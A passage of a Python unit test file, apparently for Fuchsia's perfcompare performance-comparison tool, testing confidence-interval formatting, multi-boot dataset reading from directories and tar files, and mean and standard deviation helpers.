# Corner case: negative offset. This does not make sense for a
# confidence interval and should not happen, but let's ensure it
# gets formatted anyway in case that it useful for debugging.
self.assertEqual(Format(12345.6789, -1), '12345.7 +/- -1')
# Corner cases: infinity and NaN.
self.assertEqual(Format(12345.6789, numpy.inf), '12345.7 +/- inf')
self.assertEqual(Format(12345.6789, -numpy.inf), '12345.7 +/- -inf')
self.assertEqual(Format(12345.6789, numpy.nan), '12345.7 +/- nan')
self.assertEqual(Format(numpy.inf, 0.1234), 'inf +/- 0.12')
self.assertEqual(Format(-numpy.inf, 0.1234), '-inf +/- 0.12')
self.assertEqual(Format(numpy.nan, 0.1234), 'nan +/- 0.12')
# Generate some example perf test data, allowing variation at each level of
# the sampling process (per boot, per process, and per iteration within
# each process). This follows a random effects model. Returns a list of
# lists of lists of values.
def GenerateData(
mean=1000,
stddev_across_boots=0,
stddev_across_processes=0,
stddev_across_iters=0):
it = iter(TEST_VALUES)
def GenerateValues(mean, stddev, count):
return [next(it) * stddev + mean for _ in range(count)]
# This reads 4**3 + 4**2 + 4 = 84 values from TEST_VALUES, so it does
# not exceed the number of values in TEST_VALUES.
return [
[
SLOW_INITIAL_RUN +
GenerateValues(mean_within_process, stddev_across_iters, 4)
for mean_within_process in GenerateValues(
mean_within_boot, stddev_across_processes, 4)
]
for mean_within_boot in GenerateValues(mean, stddev_across_boots, 4)
]
class StatisticsTest(TempDirTestCase):
def ResultsDictForValues(self, run_values):
return {
'label': 'ExampleTest',
'test_suite': 'example_suite',
'unit': 'nanoseconds',
'values': run_values
}
# Given data in the format returned by GenerateData(), writes this data
# to a temporary directory.
def DirOfData(self, data):
dir_path = self.MakeTempDir()
os.mkdir(os.path.join(dir_path, 'by_boot'))
for boot_idx, results_for_boot in enumerate(data):
test_dir = os.path.join(
dir_path, 'by_boot', 'boot%06d' % boot_idx, 'test-name',
'subdir')
os.makedirs(test_dir)
for process_idx, run_values in enumerate(results_for_boot):
dest_file = os.path.join(
test_dir,
'example_process%06d.fuchsiaperf.json' % process_idx)
WriteJsonFile(
dest_file, [self.ResultsDictForValues(run_values)])
return dir_path
# Sanity-check that DirOfData() writes data in the correct format by
# reading back some simple test data.
def test_readback_of_data(self):
data = [[[1, 2], [3, 4]], [[5, 6], [7, 8]]]
dataset = perfcompare.MultiBootDataset(self.DirOfData(data))
boot_datasets = list(dataset.GetBootDatasets())
self.assertEqual(len(boot_datasets), 2)
self.assertEqual(
list(boot_datasets[0].GetProcessDatasets()), [
[self.ResultsDictForValues([1, 2])],
[self.ResultsDictForValues([3, 4])]
])
self.assertEqual(
list(boot_datasets[1].GetProcessDatasets()), [
[self.ResultsDictForValues([5, 6])],
[self.ResultsDictForValues([7, 8])]
])
def TarFileOfDir(self, dir_path, write_mode):
tar_filename = os.path.join(self.MakeTempDir(), 'out.tar')
with tarfile.open(tar_filename, write_mode) as tar:
for name in os.listdir(dir_path):
tar.add(os.path.join(dir_path, name), arcname=name)
return tar_filename
def test_readback_of_data_from_tar_file(self):
data = [[[1, 2], [3, 4]]]
dir_path = self.DirOfData(data)
self.assertEqual(len(os.listdir(os.path.join(dir_path, 'by_boot'))), 1)
# Test the uncompressed and gzipped cases.
for write_mode in ('w', 'w:gz'):
tar_filename = self.TarFileOfDir(
os.path.join(dir_path, 'by_boot', 'boot000000'), write_mode)
boot_dataset = perfcompare.SingleBootDataset(tar_filename)
self.assertEqual(
list(boot_dataset.GetProcessDatasets()), [
[self.ResultsDictForValues([1, 2])],
[self.ResultsDictForValues([3, 4])]
])
def CheckConfidenceInterval(self, data, interval_string):
dir_path = self.DirOfData(data)
test_name = 'example_suite: ExampleTest'
stats = perfcompare.StatsFromMultiBootDataset(
perfcompare.MultiBootDataset(dir_path))[test_name]
self.assertEqual(stats.FormatConfidenceInterval(), interval_string)
# Test the CIs produced with variation at different levels of the
# multi-level sampling process.
def test_confidence_intervals(self):
self.CheckConfidenceInterval(GenerateData(), '1000 +/- 0 ns')
self.CheckConfidenceInterval(
GenerateData(stddev_across_boots=100), '1021 +/- 452 ns')
self.CheckConfidenceInterval(
GenerateData(stddev_across_processes=100), '1012 +/- 151 ns')
self.CheckConfidenceInterval(
GenerateData(stddev_across_iters=100), '981 +/- 74 ns')
# Test the case where just a single value is produced per process run.
def test_confidence_interval_with_single_value_per_process(self):
self.CheckConfidenceInterval([[[100]], [[101]]], '100 +/- 32 ns')
# If the "before" and "after" results have identical confidence
# intervals, that should be treated as "no difference", including when
# the CIs are zero-width (as tested here).
def test_comparing_equal_zero_width_confidence_intervals(self):
dir_path = self.DirOfData([[[200]], [[200]]])
stdout = io.StringIO()
perfcompare.Main(['compare_perf', dir_path, dir_path], stdout)
output = stdout.getvalue()
GOLDEN.AssertCaseEq('comparison_no_change_zero_width_ci', output)
class PerfCompareTest(TempDirTestCase):
def AddIgnoredFiles(self, dest_dir):
# Include a summary.json file to check that we skip reading it.
with open(os.path.join(dest_dir, 'summary.json'), 'w') as fh:
fh.write('dummy_data')
# Include a *.catapult_json file to check that we skip reading these.
with open(os.path.join(dest_dir, 'foo.catapult_json'), 'w') as fh:
fh.write('dummy_data')
def WriteExampleDataDir(
self,
dir_path,
mean=1000,
stddev=100,
drop_one=False,
single_boot=False):
results = [('ClockGetTimeExample', GenerateTestData(mean, stddev))]
if not drop_one:
results.append(('SecondExample', GenerateTestData(2000, 300)))
if single_boot:
for test_name, values in results:
dest_dir = os.path.join(dir_path, 'by_boot', 'boot0')
dest_file = os.path.join(
dest_dir, '%s.fuchsiaperf.json' % test_name)
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
self.AddIgnoredFiles(dest_dir)
WriteJsonFile(
dest_file, [
{
'label': test_name,
'test_suite': 'fuchsia.example',
'unit': 'nanoseconds',
'values': SLOW_INITIAL_RUN + values
}
])
else:
for test_name, values in results:
for idx, value in enumerate(values):
dest_dir = os.path.join(
dir_path, 'by_boot', 'boot%06d' % idx)
dest_file = os.path.join(
dest_dir, '%s.fuchsiaperf.json' % test_name)
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
self.AddIgnoredFiles(dest_dir)
WriteJsonFile(
dest_file, [
{
'label': test_name,
'test_suite': 'fuchsia.example',
'unit': 'nanoseconds',
'values': SLOW_INITIAL_RUN + [value]
}
])
def ExampleDataDir(self, **kwargs):
dir_path = self.MakeTempDir()
self.WriteExampleDataDir(dir_path, **kwargs)
return dir_path
def test_reading_results_from_dir(self):
dir_path = self.ExampleDataDir()
results = perfcompare.StatsFromMultiBootDataset(
perfcompare.MultiBootDataset(dir_path))
test_name = 'fuchsia.example: ClockGetTimeExample'
self.assertEqual(
results[test_name].FormatConfidenceInterval(), '992 +/- 26 ns')
# Returns the output of compare_perf when run on the given directories.
def ComparePerf(self, before_dir, after_dir):
stdout = io.StringIO()
perfcompare.Main(['compare_perf', before_dir, after_dir], stdout)
return stdout.getvalue()
def test_mean_and_stddev(self):
values = [10, 5, 15]
mean_val, stddev_val = perfcompare.MeanAndStddev(values)
self.assertEqual(mean_val, 10.0)
self.assertEqual(perfcompare.Mean(values), 10.0)
self.assertEqual(stddev_val, 5.0)
# Single-value sample.
self.assertEqual(perfcompare.MeanAndStddev([123]), (123.0, None))
# Check error cases.
self.assertRaises(AssertionError, lambda: perfcompare.Mean([]))
self.assertRaises(AssertionError, lambda: perfcompare.MeanAndStddev([]))
# Check that data written using the golden file helper reads back
# the same.
def test_golden_file_write_and_read(self):
temp_file = os.path.join(self.MakeTempDir(), 'file')
writer = GoldenDataOutput()
writer.AssertCaseEq('a_key', 'a_value')
writer.AssertCaseEq('b_key', 'line 1\n' 'line |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.